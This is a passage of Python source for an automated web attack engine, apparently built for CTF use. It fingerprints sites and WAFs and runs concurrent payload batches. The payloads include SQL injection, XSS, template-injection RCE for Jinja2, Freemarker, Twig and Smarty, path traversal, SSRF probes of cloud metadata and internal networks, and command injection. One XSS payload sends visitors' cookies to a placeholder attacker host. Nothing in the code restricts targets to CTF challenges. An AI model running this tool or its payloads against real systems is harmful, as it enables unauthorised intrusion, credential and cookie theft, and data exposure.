# -*- coding: utf-8 -*-
"""
URL Vulnerability Analyzer -- CTF attack engine for Yang-Web.

Pipeline:
    1. Parse URL - Extract parameters and path features
    2. Match features - Score vulnerability types
    3. Generate payloads - Ready for attack testing
    4. Execute attacks - Analyze responses for confirmation

All docstrings and comments in plain ASCII English.
"""

from urllib.parse import urlparse, parse_qs, unquote, urlencode, urlunparse, quote
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
from typing import List, Dict, Tuple, Optional, Callable
from concurrent.futures import ThreadPoolExecutor, as_completed, TimeoutError as FuturesTimeoutError
import re
import ssl
import socket
import time
import json as _json
import threading
import base64


# ============================================================================
#  v3.0 Smart Engine: Fingerprinting + Concurrent + Adaptive Scheduling
# ============================================================================

class SmartFingerprinter:
    """Detect CMS, WAF, framework, and source-level vulnerability patterns.

    Analyzes HTTP response headers and body to identify:
    - CMS/框架 (WordPress, ThinkPHP, Flask, Django, etc.)
    - WAF (阿里云, Cloudflare, 360, ModSecurity)
    - PHP source patterns: system/exec/eval/shell_exec/passthru
    - PHP superglobals: $_GET/$_POST/$_REQUEST 参数
    - HTTP method hints: POST/GET from source code
    - File inclusion patterns
    """

    # ── CMS / Framework fingerprints from headers + body ──
    CMS_FINGERPRINTS = [
        (r'wp-content|wp-includes|/wp-json|/wp-admin', 'WordPress', ['PHP', 'SQLi', 'Upload'], 80),
        (r'X-Powered-By:\s*ThinkPHP|thinkphp|ThinkPHP', 'ThinkPHP', ['SQLi', 'RCE', 'LFI'], 75),
        (r'X-Powered-By:\s*PHP/\d|PHPSESSID', 'PHP原生', ['PHP', 'RCE', 'LFI'], 60),
        (r'flask|werkzeug|jinja2|__debugger__', 'Flask', ['SSTI', 'SSRF', 'LFI'], 80),
        (r'django|csrftoken|__debug__|django_language', 'Django', ['SSTI', 'SQLi', 'SSRF'], 75),
        (r'laravel|XSRF-TOKEN|laravel_session', 'Laravel', ['SQLi', 'SSTI', 'SSRF'], 75),
        (r'JSESSIONID|jsessionid|org\.springframework|spring-boot', 'Spring/Java', ['SSTI', 'SSRF', 'SQLi'], 70),
        (r'X-Powered-By:\s*Express|node\.js|nodejs', 'Express/Node', ['SSTI', 'SSRF', 'NoSQLi'], 65),
        (r'ASP\.NET|ASPSESSIONID|__VIEWSTATE|X-AspNet', 'ASP.NET', ['SQLi', 'Upload', 'SSRF'], 65),
        (r'nginx|apache|tomcat|iis', 'Generic', ['SQLi', 'XSS', 'RCE'], 30),
    ]

    # ── WAF fingerprints ──
    WAF_PATTERNS = [
        (r'aliyun|yundun|ALI-SW-|Alibaba|AliyunWAF', '阿里云WAF'),
        (r'cf-ray|__cfduid|cloudflare-nginx|cf-cache-status', 'Cloudflare'),
        (r'360wzws|wangzhan\.360|360 web server', '360WAF'),
        (r'Mod_Security|mod_security|This error was generated by Mod_Security', 'ModSecurity'),
        (r'TencentCloudWAF|[Tt]encent[Ww]af|[Tt]-[Ss]ec', '腾讯云WAF'),
        (r'BaishanCloud|BWS-FAIL|bwstest', '白山云WAF'),
        (r'Yunjiasu|yunjiasu-nginx', '云加速/创宇'),
        (r'SafeDog|safedog|WAF/\d\.\d', '安全狗'),
        (r'DDoS-GUARD|ddos-guard', 'DDoS-Guard'),
        (r'F5|BIG-IP|BIGIP|ASM-WAF', 'F5 BIG-IP ASM'),
    ]

    # ── PHP source code vulnerability patterns ──
    PHP_DANGEROUS_FUNCTIONS = [
        (r'system\s*\(', 'RCE', 95, 'system() 命令执行'),
        (r'exec\s*\(', 'RCE', 95, 'exec() 命令执行'),
        (r'shell_exec\s*\(', 'RCE', 95, 'shell_exec() 命令执行'),
        (r'passthru\s*\(', 'RCE', 90, 'passthru() 命令执行'),
        (r'popen\s*\(', 'RCE', 85, 'popen() 命令执行'),
        (r'proc_open\s*\(', 'RCE', 85, 'proc_open() 命令执行'),
        (r'eval\s*\(', 'RCE', 90, 'eval() 代码执行'),
        (r'assert\s*\(', 'RCE', 85, 'assert() 代码执行'),
        (r'preg_replace\s*\([^)]*/e', 'RCE', 85, 'preg_replace /e 代码执行'),
        (r'call_user_func\s*\(', 'RCE', 80, 'call_user_func() 回调执行'),
        (r'create_function\s*\(', 'RCE', 80, 'create_function() 代码执行'),
        (r'include\s*\(\s*\$', 'LFI', 85, 'include 变量文件包含'),
        (r'require\s*\(\s*\$', 'LFI', 85, 'require 变量文件包含'),
        (r'include_once\s*\(\s*\$', 'LFI', 80, 'include_once 变量文件包含'),
        (r'require_once\s*\(\s*\$', 'LFI', 80, 'require_once 变量文件包含'),
        (r'file_get_contents\s*\(\s*\$', 'SSRF', 80, 'file_get_contents 变量 → SSRF'),
        (r'unserialize\s*\(', 'PHP', 80, 'unserialize() 反序列化'),
        (r'highlight_file\s*\(|show_source\s*\(', 'PHP', 60, 'highlight_file 源码泄露'),
        (r'mysql_query\s*\(|mysqli_query\s*\(|->query\s*\(', 'SQLi', 75, 'SQL查询函数'),
        (r'SELECT.*FROM.*WHERE.*\$|INSERT.*INTO.*\$', 'SQLi', 80, 'SQL拼接 → SQL注入'),
    ]

    # ── PHP superglobal detection ──
    PHP_SUPERGLOBALS = [
        (r'\$_GET\[["\'](\w+)["\']', 'GET'),
        (r'\$_POST\[["\'](\w+)["\']', 'POST'),
        (r'\$_REQUEST\[["\'](\w+)["\']', 'REQUEST'),
        (r'\$_COOKIE\[["\'](\w+)["\']', 'COOKIE'),
    ]

    def __init__(self):
        self.last_results = {}

    def fingerprint(self, headers: Dict, body: str, url: str = "") -> Dict:
        """Run full fingerprinting: CMS + WAF + source patterns.

        Returns:
            {"cms": str, "cms_confidence": int, "waf": str or None,
             "php_vulns": [{"type":str, "confidence":int, "reason":str, "evidence":str}],
             "php_params": [{"name":str, "method":str}],
             "server": str, "tech_stack": [str]}
        """
        # Strip HTML tags for source analysis
        clean_body = re.sub(r'<[^>]+>', '', body)
        # Also handle HTML entities
        clean_body2 = clean_body.replace('&lt;', '<').replace('&gt;', '>').replace('&amp;', '&').replace('&quot;', '"').replace('&#039;', "'")

        headers_text = '\n'.join(f'{k}: {v}' for k, v in headers.items())
        combined = headers_text + '\n' + clean_body2[:10000]

        result = {
            'cms': 'Unknown', 'cms_confidence': 0, 'waf': None,
            'php_vulns': [], 'php_params': [],
            'server': headers.get('Server', 'Unknown'),
            'tech_stack': [],
        }

        # ── Detect WAF ──
        for pattern, waf_name in self.WAF_PATTERNS:
            if re.search(pattern, combined, re.IGNORECASE):
                result['waf'] = waf_name
                break

        # ── Detect CMS/Framework ──
        best_cms, best_conf = 'Unknown', 0
        for pattern, cms, related_vulns, conf in self.CMS_FINGERPRINTS:
            if re.search(pattern, combined, re.IGNORECASE):
                if conf > best_conf:
                    best_cms, best_conf = cms, conf
                    result['tech_stack'] = related_vulns
        result['cms'] = best_cms
        result['cms_confidence'] = best_conf

        # ── Detect PHP dangerous functions in source ──
        for pattern, vtype, conf, reason in self.PHP_DANGEROUS_FUNCTIONS:
            matches = list(re.finditer(pattern, clean_body2))
            if matches:
                evidence = matches[0].group(0)[:60]
                result['php_vulns'].append({
                    'type': vtype, 'confidence': conf,
                    'reason': reason, 'evidence': evidence,
                    'count': len(matches),
                })

        # ── Extract PHP superglobal params ──
        for pattern, method in self.PHP_SUPERGLOBALS:
            for m in re.finditer(pattern, clean_body2):
                name = m.group(1)
                if not any(p['name'] == name for p in result['php_params']):
                    result['php_params'].append({'name': name, 'method': method})

        self.last_results = result
        return result


class ConcurrentEngine:
    """Thread-pool HTTP engine for parallel attack execution.

    Features:
    - Parallel request execution via ThreadPoolExecutor
    - Automatic retry with exponential backoff
    - Graceful timeout handling
    - Result aggregation with dedup
    - Flag detection in any response
    """

    def __init__(self, max_workers: int = 15, timeout: int = 5, retries: int = 2):
        self.max_workers = max_workers
        self.timeout = timeout
        self.retries = retries
        self.flag_re = FLAG_RE
        self.cancelled = False
        self._lock = threading.Lock()

    def cancel(self):
        """Signal cancellation for all pending tasks."""
        self.cancelled = True

    def reset(self):
        """Reset cancellation flag."""
        self.cancelled = False

    def attack_batch(self, tasks: List[Dict],
                     on_progress: Callable = None,
                     on_flag: Callable = None) -> List[Dict]:
        """Execute multiple attack tasks concurrently.

        Args:
            tasks: List of {"url": str, "param": str, "payload_def": dict,
                            "method": "GET"|"POST", "form_inputs": list}
            on_progress: Callable(stage, item, status)
            on_flag: Callable(flag) — called immediately when flag found

        Returns:
            (results_list, found_flag_or_None)
        """
        if not tasks:
            return [], None

        results = []
        found_flag = [None]  # Use list for thread-safe mutation

        def _run_one(task, idx):
            if self.cancelled or found_flag[0]:
                return None
            try:
                res = self._execute_with_retry(task)
                if res:
                    resp = res.get('response', {})
                    body = resp.get('body', '')
                    # Check for flag immediately
                    if body and not found_flag[0]:
                        flags = self.flag_re.findall(body)
                        if flags:
                            with self._lock:
                                if not found_flag[0]:
                                    found_flag[0] = flags[0]
                            if on_flag:
                                try:
                                    on_flag(flags[0])
                                except Exception:
                                    pass
                    # Progress callback
                    if on_progress:
                        try:
                            name = task.get('payload_def', {}).get('name', f'task#{idx}')
                            analysis = res.get('analysis', {})
                            status = '✓' if analysis.get('success') else '✗'
                            on_progress('attack', name, f'{status} {analysis.get("detail","")[:50]}')
                        except Exception:
                            pass
                return res
            except Exception:
                return None

        with ThreadPoolExecutor(max_workers=min(self.max_workers, len(tasks))) as executor:
            futures = {executor.submit(_run_one, t, i): i for i, t in enumerate(tasks)}
            try:
                for future in as_completed(futures, timeout=self.timeout * 5):
                    if self.cancelled:
                        break
                    r = future.result()
                    if r:
                        results.append(r)
                        # Early exit if flag found
                        if found_flag[0]:
                            break
            except FuturesTimeoutError:
                pass
            except Exception:
                pass
            finally:
                # Cancel remaining futures
                for f in futures:
                    f.cancel()

        return results, found_flag[0]

    def _execute_with_retry(self, task: Dict) -> Optional[Dict]:
        """Execute a single attack with retry logic."""
        url = task['url']
        param = task['param']
        pdef = task['payload_def']
        http_method = task.get('method', 'GET')
        form_inputs = task.get('form_inputs')

        for attempt in range(self.retries + 1):
            try:
                res = execute_attack(url, param, pdef, http_method=http_method,
                                     form_inputs=form_inputs, timeout=self.timeout)
                return res
            except (socket.timeout, URLError, OSError) as e:
                if attempt < self.retries:
                    time.sleep(0.3 * (2 ** attempt))  # Exponential backoff
                else:
                    return {
                        'attack_url': url, 'param': param,
                        'payload_name': pdef.get('name', 'unknown'),
                        'response': {'ok': False, 'error': str(e)},
                        'analysis': {'success': False, 'detail': f'Failed after {self.retries+1} attempts: {e}'},
                    }
            except Exception as e:
                return {
                    'attack_url': url, 'param': param,
                    'payload_name': pdef.get('name', 'unknown'),
                    'response': {'ok': False, 'error': str(e)},
                    'analysis': {'success': False, 'detail': f'Error: {e}'},
                }
        return None


class AdaptiveScheduler:
    """Context-aware attack scheduler.

    Given fingerprint + analysis results, determines:
    - Optimal attack order (most likely vulns first)
    - Which payloads to skip (e.g. no SQLi if source shows pure RCE)
    - HTTP method (GET vs POST based on source analysis)
    - Priority escalation path
    """

    # Priority: vuln types ordered by exploitability in CTF
    CTF_VULN_PRIORITY = [
        'RCE',    # Direct command execution → fastest flag
        'PHP',    # PHP-specific tricks
        'LFI',    # File read → flag or source → RCE
        'SQLi',   # DB extraction → flag table
        'SSTI',   # Template injection → RCE
        'SSRF',   # Internal service access → flag
        'Upload', # File upload → webshell
        'XSS',    # Usually least useful in CTF flag extraction
    ]

    def __init__(self):
        self.fingerprint = None
        self.analysis = None

    def schedule(self, analysis_results: List[Dict],
                 fingerprint: Dict) -> List[Dict]:
        """Generate optimized attack plan.

        Args:
            analysis_results: From analyze_url() → results field
            fingerprint: From SmartFingerprinter.fingerprint()

        Returns:
            List of attack tasks: [{"url", "param", "payload_def", "method", "form_inputs"}]
        """
        self.fingerprint = fingerprint
        self.analysis = analysis_results

        # Detect the likely HTTP method from source code
        php_params = fingerprint.get('php_params', [])
        uses_post = any(p['method'] == 'POST' for p in php_params)
        uses_get = any(p['method'] == 'GET' for p in php_params)

        # Boost confidence for vuln types detected in source
        php_vulns = fingerprint.get('php_vulns', [])
        php_vuln_types = set(v['type'] for v in php_vulns)

        # Merge analysis results with fingerprint boosts
        merged = {}
        for ar in analysis_results:
            vt = ar['type']
            conf = ar['confidence']
            # Boost from source analysis
            if vt in php_vuln_types:
                conf = min(100, conf + 40)
            merged[vt] = {
                'type': vt,
                'confidence': conf,
                'params': ar.get('params', []),
                'payloads': ar.get('payloads', []),
                'type_cn': ar.get('type_cn', vt),
            }

        # Add vulns found only in source (not in original analysis)
        for pv in php_vulns:
            vt = pv['type']
            if vt not in merged:
                # Create entry with params from source
                src_params = [p['name'] for p in php_params]
                merged[vt] = {
                    'type': vt,
                    'confidence': pv['confidence'],
                    'params': src_params if src_params else ['a'],
                    'payloads': ATTACK_PAYLOADS.get(vt, []),
                    'type_cn': {'RCE': '远程命令执行', 'LFI': '文件包含',
                                'SQLi': 'SQL注入', 'PHP': 'PHP漏洞',
                                'SSRF': '服务端请求伪造', 'SSTI': '模板注入',
                                'XSS': '跨站脚本', 'Upload': '文件上传'}.get(vt, vt),
                }

        # Sort by priority then confidence
        def _sort_key(item):
            vt = item[0]
            info = item[1]
            try:
                prio = self.CTF_VULN_PRIORITY.index(vt)
            except ValueError:
                prio = 99
            return (prio, -info['confidence'])

        sorted_vulns = sorted(merged.items(), key=_sort_key)

        # Generate attack tasks
        tasks = []
        url = fingerprint.get('_url', '')
        for vt, info in sorted_vulns:
            if info['confidence'] < 20:
                continue  # Skip low-confidence guesswork
            method = 'POST' if uses_post else 'GET'
            params = info['params'] if info['params'] else ['a']
            payloads = info.get('payloads', [])
            # Limit payloads per type based on confidence
            max_payloads = 8 if info['confidence'] >= 80 else (5 if info['confidence'] >= 60 else 3)
            for param in params[:2]:  # Max 2 params per vuln type
                for pdef in payloads[:max_payloads]:
                    tasks.append({
                        'url': url,
                        'param': param,
                        'payload_def': pdef,
                        'method': method,
                        'form_inputs': None,
                    })

        # Add smart escalation tasks at the end (flag file reads)
        if php_vuln_types & {'RCE', 'LFI', 'PHP'}:
            for flag_cmd in [
                'cat /flag', 'cat /flag.txt', 'cat /fla*', 'cat /f*',
                'cat flag.txt', 'cat flag', 'cat /etc/flag',
                'tac /flag', 'nl /flag', 'head -c 100 /flag',
                'find / -name "flag*" 2>/dev/null',
            ]:
                tasks.append({
                    'url': url,
                    'param': (params[0] if params else 'a'),
                    'payload_def': {
                        'name': f'flag:{flag_cmd[:20]}',
                        'payload': flag_cmd,
                        'method': 'replace',
                        'detect': 'content',
                        'match': ['flag{', 'CTF{', 'ISCC{', 'Geesec{', 'DASCTF{'],
                        'tip': '直接读flag文件',
                    },
                    'method': method,
                    'form_inputs': None,
                })

        return tasks


# ============================================================================
#  Parameter Signatures
# ============================================================================

PARAM_SIGNATURES: Dict[str, List[Tuple[str, int, str]]] = {
    # SQLi
    "id":        [("SQLi", 85, "param 'id' commonly used for DB lookups")],
    "uid":       [("SQLi", 80, "param 'uid' likely user ID query")],
    "user":      [("SQLi", 70, "param 'user' often used in SQL queries")],
    "username":  [("SQLi", 70, "param 'username' likely SQL lookup")],
    "product":   [("SQLi", 65, "param 'product' likely product ID query")],
    "article":   [("SQLi", 65, "param 'article' likely article ID query")],
    "news":      [("SQLi", 60, "param 'news' likely news ID query")],
    "cat":       [("SQLi", 65, "param 'cat' likely category ID filter")],
    "category":  [("SQLi", 65, "param 'category' likely category filter")],
    "pid":       [("SQLi", 80, "param 'pid' likely parent/product ID")],
    "no":        [("SQLi", 70, "param 'no' likely numeric identifier")],
    "num":       [("SQLi", 60, "param 'num' likely numeric parameter")],
    "sort":      [("SQLi", 60, "param 'sort' possibly feeds ORDER BY")],
    "order":     [("SQLi", 70, "param 'order' possibly feeds ORDER BY")],
    "search":    [("SQLi", 60, "param 'search' likely SQL query"), ("XSS", 55, "search queries may reflect XSS")],
    "keyword":   [("SQLi", 60, "param 'keyword' used in search queries"), ("XSS", 50, "keyword may reflect XSS")],
    "query":     [("SQLi", 60, "param 'query' often SQL query string"), ("XSS", 50, "query may reflect XSS")],
    "filter":    [("SQLi", 55, "param 'filter' likely SQL WHERE clause")],
    "offset":    [("SQLi", 50, "param 'offset' likely LIMIT/OFFSET clause")],
    "limit":     [("SQLi", 50, "param 'limit' likely LIMIT clause")],
    "page_id":   [("SQLi", 60, "param 'page_id' likely page ID query")],
    "item":      [("SQLi", 55, "param 'item' likely item ID query")],
    "row":       [("SQLi", 50, "param 'row' possibly row selector")],
    "table":     [("SQLi", 70, "param 'table' suspicious table name param")],
    "column":    [("SQLi", 65, "param 'column' suspicious column selector")],
    "record":    [("SQLi", 55, "param 'record' likely record ID query")],
    "type":      [("SQLi", 50, "param 'type' often used in filter queries")],
    # XSS
    "msg":       [("XSS", 75, "param 'msg' commonly reflected as message")],
    "message":   [("XSS", 75, "param 'message' commonly reflected")],
    "name":      [("XSS", 65, "param 'name' often reflected in page"), ("SSTI", 35, "name may be templated")],
    "title":     [("XSS", 60, "param 'title' often reflected in page")],
    "comment":   [("XSS", 70, "param 'comment' commonly reflected"), ("SQLi", 40, "comments may be in DB")],
    "feedback":  [("XSS", 65, "param 'feedback' commonly reflected")],
    "desc":      [("XSS", 55, "param 'desc' often reflected description")],
    "content":   [("XSS", 55, "param 'content' often reflected"), ("SSTI", 30, "content may be templated")],
    "text":      [("XSS", 55, "param 'text' often reflected"), ("SSTI", 35, "text may be templated")],
    "email":     [("XSS", 50, "param 'email' may be reflected in page")],
    "nickname":  [("XSS", 55, "param 'nickname' often reflected in page")],
    "q":         [("XSS", 55, "param 'q' common search shortname"), ("SQLi", 55, "shortname often SQL query")],
    "body":      [("XSS", 55, "param 'body' often reflected content")],
    "subject":   [("XSS", 50, "param 'subject' may be reflected")],
    "reply":     [("XSS", 55, "param 'reply' may be reflected")],
    "note":      [("XSS", 50, "param 'note' may be reflected in page")],
    # SSTI
    "template":  [("SSTI", 85, "param 'template' strongly suggests template engine")],
    "tpl":       [("SSTI", 80, "param 'tpl' short for template")],
    "view":      [("SSTI", 60, "param 'view' may control template rendering")],
    "page":      [("SSTI", 40, "param 'page' may control template inclusion"), ("LFI", 70, "param 'page' may include files")],
    "render":    [("SSTI", 75, "param 'render' strongly suggests template rendering")],
    "preview":   [("SSTI", 50, "param 'preview' may use template rendering")],
    # LFI
    "file":      [("LFI", 90, "param 'file' strongly suggests file inclusion")],
    "path":      [("LFI", 80, "param 'path' likely used for file/directory access")],
    "include":   [("LFI", 90, "param 'include' strongly suggests file inclusion")],
    "require":   [("LFI", 85, "param 'require' strongly suggests file inclusion")],
    "filename":  [("LFI", 80, "param 'filename' suggests file access")],
    "document":  [("LFI", 60, "param 'document' may reference files")],
    "folder":    [("LFI", 65, "param 'folder' likely directory access")],
    "dir":       [("LFI", 70, "param 'dir' likely directory listing")],
    "lang":      [("LFI", 60, "param 'lang' may load language files")],
    "locale":    [("LFI", 55, "param 'locale' may load locale files")],
    "module":    [("LFI", 55, "param 'module' may load module files")],
    "load":      [("LFI", 65, "param 'load' may load external files")],
    # SSRF
    "url":       [("SSRF", 90, "param 'url' strongly suggests SSRF target")],
    "link":      [("SSRF", 80, "param 'link' likely server-fetched URL")],
    "src":       [("SSRF", 75, "param 'src' likely server-fetched source")],
    "source":    [("SSRF", 70, "param 'source' likely server-fetched content")],
    "target":    [("SSRF", 70, "param 'target' may be proxy target")],
    "dest":      [("SSRF", 70, "param 'dest' may be proxy destination")],
    "uri":       [("SSRF", 85, "param 'uri' strongly suggests URL fetch")],
    "image":     [("SSRF", 65, "param 'image' may be server-fetched image URL")],
    "img":       [("SSRF", 65, "param 'img' short for image URL")],
    "avatar":    [("SSRF", 60, "param 'avatar' may be fetched avatar URL")],
    "proxy":     [("SSRF", 80, "param 'proxy' strongly suggests proxying")],
    "fetch":     [("SSRF", 80, "param 'fetch' strongly suggests URL fetching")],
    "web":       [("SSRF", 55, "param 'web' may be web resource URL")],
    # RCE
    "cmd":       [("RCE", 90, "param 'cmd' strongly suggests command execution")],
    "command":   [("RCE", 90, "param 'command' strongly suggests command execution")],
    "exec":      [("RCE", 85, "param 'exec' strongly suggests command execution")],
    "shell":     [("RCE", 85, "param 'shell' strongly suggests shell command")],
    "ping":      [("RCE", 80, "param 'ping' may execute ping command")],
    "ip":        [("RCE", 60, "param 'ip' may be used in system command")],
    "host":      [("RCE", 55, "param 'host' may be used in system command"), ("SSRF", 40, "host may also be SSRF target")],
    "domain":    [("RCE", 55, "param 'domain' may be used in system command")],
    # Upload
    "upload":    [("Upload", 85, "param 'upload' suggests file upload endpoint")],
}

# ============================================================================
#  Path Patterns
# ============================================================================

PATH_PATTERNS: List[Tuple[str, str, int, str]] = [
    (r"\.php",       "PHP",  80, "PHP extension, likely PHP application"),
    (r"\.asp",       "SQLi", 50, "ASP extension, commonly paired with SQL vulns"),
    (r"\.jsp",       "SSTI", 40, "JSP extension, Java template engine possible"),
    (r"/upload",     "Upload", 75, "Path contains upload, file upload endpoint"),
    (r"/admin",      "SQLi", 50, "Admin panel, often has SQL injection surface"),
    (r"/login",      "SQLi", 55, "Login page, commonly SQL injection target"),
    (r"/search",     "SQLi", 50, "Search page, SQL/XSS injection surface"),
    (r"/proxy",      "SSRF", 75, "Proxy path, strong SSRF indicator"),
    (r"/fetch",      "SSRF", 70, "Fetch path, SSRF indicator"),
    (r"/api",        "SQLi", 40, "API endpoint, may have SQL injection surface"),
    (r"/debug",      "SSTI", 40, "Debug path, may expose template internals"),
    (r"/ping",       "RCE", 70, "Ping endpoint, commonly vulnerable to command injection"),
    (r"/download",   "LFI", 65, "Download endpoint, path traversal risk"),
    (r"/backup",     "LFI", 55, "Backup path, file access risk"),
    (r"/config",     "LFI", 60, "Config path, sensitive file access risk"),
    (r"/cmd",        "RCE", 80, "Cmd endpoint, strong command injection indicator"),
    (r"/exec",       "RCE", 75, "Exec endpoint, command execution indicator"),
    (r"/shell",      "RCE", 80, "Shell endpoint, remote command execution risk"),
    (r"/console",    "RCE", 60, "Console endpoint, possible command execution"),
    (r"/wp-admin",   "SQLi", 55, "WordPress admin, SQL injection surface"),
    (r"/manager",    "Upload", 50, "Manager path, file upload risk"),
]

# ============================================================================
#  Attack Payloads
# ============================================================================

ATTACK_PAYLOADS: Dict[str, List[Dict]] = {
    "SQLi": [
        {"name": "引号闭合探测", "payload": "\u0027", "method": "append", "detect": "error", "match": [], "tip": "添加单引号检测SQL语法错误"},
        {"name": "OR永真绕过", "payload": "admin\u0027 OR \u00271\u0027=\u00271", "method": "replace", "detect": "success", "match": [], "tip": "OR 1=1 绕过登录认证"},
        {"name": "联合查询探测", "payload": "\u0027 UNION SELECT 1,2,3-- ", "method": "append", "detect": "content", "match": ["1", "2", "3"], "tip": "UNION SELECT 定位回显列"},
        {"name": "延时盲注(MySQL)", "payload": "\u0027 AND sleep(3)-- ", "method": "append", "detect": "timeout", "match": [], "tip": "sleep延时检测SQL盲注"},
        {"name": "布尔盲注", "payload": "\u0027 AND 1=1-- ", "method": "append", "detect": "normal", "match": [], "tip": "布尔真值测试; 对比 AND 1=2 确认注入点"},
        {"name": "报错注入(updatexml)", "payload": "\u0027 AND updatexml(1,concat(0x7e,database()),1)-- ", "method": "append", "detect": "error", "match": [], "tip": "updatexml报错提取数据库名"},
        {"name": "注释符绕过", "payload": "\u0027 OR 1=1#", "method": "append", "detect": "success", "match": [], "tip": "#号注释绕过MySQL单行限制"},
        {"name": "排序探测列数", "payload": "\u0027 ORDER BY 5-- ", "method": "append", "detect": "error", "match": [], "tip": "ORDER BY 探测列数"},
        {"name": "查数据库名", "payload": "\u0027 UNION SELECT 1,database(),3-- ", "method": "append", "detect": "content", "match": [], "tip": "UNION SELECT 提取数据库名"},
    ],
    "XSS": [
        {"name": "基础script标签", "payload": "\u003Cscript\u003Ealert(1)\u003C/script\u003E", "method": "replace", "detect": "content", "match": ["\u003Cscript\u003Ealert(1)\u003C/script\u003E"], "tip": "反射型XSS script标签注入"},
        {"name": "IMG onerror", "payload": "\u003Cimg src=x onerror=alert(1)\u003E", "method": "replace", "detect": "content", "match": ["onerror=alert(1)"], "tip": "绕过script过滤, img + onerror"},
        {"name": "SVG onload", "payload": "\u003Csvg onload=alert(1)\u003E", "method": "replace", "detect": "content", "match": ["onload=alert(1)"], "tip": "SVG onload 事件处理器"},
        {"name": "属性逃逸", "payload": "\u0022\u0027\u003E\u003Cscript\u003Ealert(1)\u003C/script\u003E", "method": "replace", "detect": "content", "match": ["\u003Cscript\u003Ealert(1)"], "tip": "闭合HTML属性上下文"},
        {"name": "Cookie窃取", "payload": "\u003Cimg src=x onerror=this.src=\u0027http://YOUR_IP/?c=\u0027+document.cookie\u003E", "method": "replace", "detect": "content", "match": ["document.cookie"], "tip": "窃取Cookie发送到攻击服务器"},
        {"name": "IFrame注入", "payload": "\u003Ciframe src=javascript:alert(1)\u003E", "method": "replace", "detect": "content", "match": ["\u003Ciframe"], "tip": "IFrame XSS载荷"},
    ],
    "SSTI": [
        {"name": "探测 {{7*7}}", "payload": "{{7*7}}", "method": "replace", "detect": "content", "match": ["49"], "tip": "输出49则确认 Jinja2/Twig SSTI"},
        {"name": "探测 ${7*7}", "payload": "${7*7}", "method": "replace", "detect": "content", "match": ["49"], "tip": "输出49则确认 Freemarker/Mako SSTI"},
        {"name": "Jinja2 RCE(经典)", "payload": "{{ cycler.__init__.__globals__.os.popen(\u0027id\u0027).read() }}", "method": "replace", "detect": "content", "match": ["uid=", "gid="], "tip": "Jinja2 RCE 通过 cycler globals"},
        {"name": "Jinja2 读文件", "payload": "{{ get_flashed_messages.__globals__.__builtins__.open(\u0027/etc/passwd\u0027).read() }}", "method": "replace", "detect": "content", "match": ["root:", "nobody:"], "tip": "Jinja2 globals builtins 读文件"},
        {"name": "Freemarker RCE", "payload": "\u003C#assign ex=\u0027freemarker.template.utility.Execute\u0027?new()\u003E${ex(\u0027id\u0027)}", "method": "replace", "detect": "content", "match": ["uid=", "gid="], "tip": "Freemarker RCE Execute工具类"},
        {"name": "Twig RCE", "payload": "{{ [\u0027id\u0027]|filter(\u0027system\u0027) }}", "method": "replace", "detect": "content", "match": [], "tip": "Twig RCE 通过 filter + system"},
        {"name": "Smarty RCE", "payload": "{system(\u0027id\u0027)}", "method": "replace", "detect": "content", "match": ["uid=", "gid="], "tip": "Smarty RCE system 函数"},
    ],
    "LFI": [
        {"name": "读passwd文件", "payload": "../../../etc/passwd", "method": "replace", "detect": "content", "match": ["root:", "nobody:"], "tip": "经典路径穿越读 /etc/passwd"},
        {"name": "URL编码穿越", "payload": "..%2f..%2f..%2fetc/passwd", "method": "replace", "detect": "content", "match": ["root:"], "tip": "URL编码绕过过滤"},
        {"name": "Windows穿越", "payload": "..\\..\\..\\windows\\win.ini", "method": "replace", "detect": "content", "match": ["[fonts]", "[extensions]"], "tip": "Windows路径穿越读win.ini"},
        {"name": "PHP filter Base64", "payload": "php://filter/convert.base64-encode/resource=index.php", "method": "replace", "detect": "content", "match": ["PD9waHA=", "\u003C?php"], "tip": "php://filter base64编码读PHP源码"},
        {"name": "PHP input伪协议", "payload": "php://input", "method": "replace", "detect": "normal", "match": [], "tip": "配合POST body实现RCE"},
        {"name": "Apache日志污染", "payload": "/var/log/apache2/access.log", "method": "replace", "detect": "normal", "match": [], "tip": "读取Apache日志，通过UA注入PHP代码"},
    ],
    "SSRF": [
        {"name": "探测本地SSH", "payload": "http://127.0.0.1:22", "method": "replace", "detect": "content", "match": ["SSH", "OpenSSH", "protocol"], "tip": "探测本地SSH banner确认SSRF"},
        {"name": "探测Redis", "payload": "http://127.0.0.1:6379", "method": "replace", "detect": "error", "match": [], "tip": "探测本地Redis, 报错信息确认SSRF"},
        {"name": "探测MySQL", "payload": "http://127.0.0.1:3306", "method": "replace", "detect": "content", "match": ["mysql", "caching_sha2"], "tip": "探测本地MySQL握手确认SSRF"},
        {"name": "file://读文件", "payload": "file:///etc/passwd", "method": "replace", "detect": "content", "match": ["root:", "nobody:"], "tip": "file:// 协议读本地文件"},
        {"name": "AWS元数据", "payload": "http://169.254.169.254/latest/meta-data/", "method": "replace", "detect": "content", "match": ["ami-id", "instance-id"], "tip": "访问AWS EC2元数据服务"},
        {"name": "内网探测(192.168)", "payload": "http://192.168.1.1:80", "method": "replace", "detect": "normal", "match": [], "tip": "探测192.168.x.x内网服务"},
        {"name": "内网探测(10.x)", "payload": "http://10.0.0.1:80", "method": "replace", "detect": "normal", "match": [], "tip": "探测10.x.x.x内网服务"},
    ],
    "RCE": [
        {"name": "直接执行 id", "payload": "id", "method": "replace", "detect": "content", "match": ["uid=", "gid="], "tip": "直接replace参数值，执行系统命令"},
        {"name": "列出目录 ls", "payload": "ls", "method": "replace", "detect": "normal", "match": [], "tip": "列出当前目录文件"},
        {"name": "读flag文件", "payload": "cat /fla*", "method": "replace", "detect": "content", "match": ["flag{", "CTF{", "ISCC{", "Geesec{"], "tip": "通配符绕过WAF读flag"},
        {"name": "管道注入 id", "payload": "|id", "method": "append", "detect": "content", "match": ["uid=", "gid="], "tip": "管道命令链接"},
        {"name": "双&号注入", "payload": "&&id", "method": "append", "detect": "content", "match": ["uid=", "gid="], "tip": "&& 条件命令执行"},
        {"name": "whoami", "payload": "whoami", "method": "replace", "detect": "normal", "match": [], "tip": "查看当前用户"},
        {"name": "env环境变量", "payload": "env", "method": "replace", "detect": "normal", "match": [], "tip": "获取环境变量"},
        {"name": "pwd当前路径", "payload": "pwd", "method": "replace", "detect": "normal", "match": [], "tip": "获取当前工作目录"},
        {"name": "列根目录 ls /", "payload": "ls%20/", "method": "replace", "detect": "normal", "match": [], "tip": "列出根目录"},
    ],
    "PHP": [
